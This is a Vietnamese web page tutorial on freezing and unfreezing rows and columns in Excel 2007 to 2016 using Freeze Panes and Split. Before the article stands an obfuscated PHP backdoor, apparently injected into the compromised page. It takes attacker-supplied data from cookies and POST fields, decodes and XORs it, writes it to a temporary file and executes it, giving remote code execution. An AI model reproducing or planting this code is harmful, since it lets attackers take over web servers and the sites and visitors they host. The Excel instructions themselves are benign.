$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hướng dẫn cố định hàng trong excel 2007, 2010, 2013, 2016 - Tải Chùa

Hướng dẫn cố định hàng trong excel 2007, 2010, 2013, 2016

Rate this post
Hướng dẫn các thủ thuật, các mẹo cố định hàng trong excel 2007, 2010, 2013, 2016 một cách cực kỳ đơn giản mà nhanh, chính xác để giúp bạn quản lý các working sheet hiệu quả nhất.

Nếu bạn là người làm việc thường xuyên với Office thì các thao tác cố định hàng trong excel không những phải biết mà còn phải thành thạo. Dưới đây là những mẹo hữu ích giúp bạn cố định hàng khi làm việc với bảng tính excel, trong việc quản lý một danh sách bảng lương, nhân viên, chấm công,… sao cho chuyên nghiệp mà đơn giản, dễ thực hiện nhất.

Tại sao cần phải cố định hàng trong excel?

Khi xem và xử lý các văn bản excel lớn có rất nhiều dòng, có những bảng tính lên tới hàng ngàn dòng vì vậy việc xem, so sánh, đối soát,… sẽ chiếm rất nhiều thời gian của bạn, trong khi đó lại dễ sảy ra sai sot. Trong trường hợp đó, bạn có thể cố định những hàng, phần văn bản được so sánh để rút ngắn thời gian, mang lại hiệu quả hơn trong công việc.

Các loại cố định dòng (hàng) trong excel

  • Chỉ cố định dòng (hàng): Khi bạn cuộn trang tính xuống dưới thì các dòng phía trên dòng sẽ được cố định bất động, loại này thường áp dụng cho dòng tiêu đề của các bảng dữ liệu như bảng điểm, bảng lương, hay bảng chấm công,….
  • Cố định cả dòng và cột: Khi bạn cuộn trang tính xuống dưới hay sang phải thì các cột và dòng được cốd dịnh đều bất động.

Hướng dẫn cố định hàng trong excel

Chỉ cố định hàng trong excel

Bước 1: Trước tiên để cốd dịnh từ dòng nào thì bạn cần đặt con trỏ chuột tại ô đầu tiên, ở đây cố định 3 dòng 2 3 4 sẽ đặt con trỏ chuột vào ô A5.

Chỉ cố định hàng trong excel

Bước 2: Vào view => chọn Preeze Panes.

Đối với các văn bản muốn cố định hàng đầu tiên, hoặc cột đầu tiên thì các bạn chỉ việc vào View chọn Freeze Panes:

  • Freeze Panes: Cố định dòng và cột.
  • Freeze Top Row: Cố định dòng đầu tiên từ trên cùng.
  • Freeze First Column: Cố định cột đầu tiên từ phía trái.

Cách cố định dòng trong excel

Khi đó kéo danh sách xuống, 3 dòng trên cùng vẫn sẽ hiển thị cố định.

Cố định dòng trong excel

Cách cố định hàng trong excel bằng công cụ Split

Cố định dòng trong excel bằng split là cách đơn giản giúp bạn quản lý được các working sheet hữu hiệu, nó cũng như cách trên giúp bạn phát huy vai trò khi làm việc với file khổ lớn có nhiều dòng, với nguyên tắc cố định khá đơn giản, bạn có thể làm theo các bước sau.

Bước 1: Mở file cần cố định dòng trong excel 2007, 2010, 2013,…(Đối với excel 2007 mở biểu được windows phía trên bên trái của excel).

Cố định dòng trong excel bằng split

Bước 2: Tại menu chính, chọn mục view.

Cách cố định dòng trong excel

Bước 3: Trong mục View, bấm vào biểu tượng Split.

Cố định dòng trong excel bằng Split

Lúc này working sheet của bạn sẽ hiển thị như hình dưới đây:

Kết quả cố định dòng trong excel

Bạn có thể di chuyển thanh ngang để chọn dòng cần cố định cho phù hợp.

Cách cố định cả dòng và cột trong excel

Trong trường hợp bạn muốn cố định cả dòng tiêu đề và cột tên, hãy làm như sau:

Bước 1: Chọn ô thuộc:

  • Dòng 2 (dòng liền kề bên dưới dòng tiêu đề).
  • Cột C (là cột liền kề bên phải cột tên chi nhánh)

Cố định cả dòng và cột trong excel

Bước 2: Vào view chọn Freeze panes.

cố định dòng tiêu đề trong excel

Các thao tác đã xong bây giờ bạn đã cố định được dòng tiêu đề khi in trong excel 2010, với những phiên bản khác bạn làm các thao tác tương tự.

Cách xóa cố định hàng trong excel

Xóa bỏ cố định dòng và cột trong excel

Bước 1: Vào file chọn view=> Freeze Panes.

Xóa cố định hàng trong excel

Bước 2: Trong Freeze Panes chọn Unfreeze Panes.

Cách xóa cố định hàng trong excel

Cách bỏ cố định dòng trên excel 2007, 2010, 2013,….

Để bỏ cố định dòng trong các phiên bản excel từ 2007 trở lên bạn thực hiện các bước sau:

Bước 1: Trên thanh menu chọn tab view =>chọn Freeze Panes

Xóa bỏ cố định dòng trên excel

Bước 2: Chọn Unfreeze Panes, bảng excel sẽ trở lại như ban đầu.

Hướng dẫn bỏ cố định hàng trong excel

Cách xóa cố định hàng bằng chức năng Slip

Bước 1: Vào file => Chọn tab view, đối với excel 2007 bạn chọn biểu tượng windows phía trên bên trái file excel.

Bỏ cố định hàng bằng slip

Bước 2: Trong tab view nháp chuột vào tính năng Split bạn sẽ về như vị trí bạn đầu của trang tinh.

Cách bỏ cố định hàng bằng tính năng slip

Những thủ thuật cố định hàng trong excel trên đây sẽ giúp bạn thao tác nhanh hơn, chuyên nghiệp hơn và chính xác hơn. Ngoài ra, bạn có thể tìm thêm nhiều bài hướng dẫn xóa hàng trong excel, để có thêm những kinh nghiệm làm việc với ứng dụng này. Hãy nhớ rằng những kiến thức mà bạn tìm hiểu về cách làm việc với các bảng tính sẽ giúp công việc của bạn nhanh, hiệu quả và vô cùng chính xác.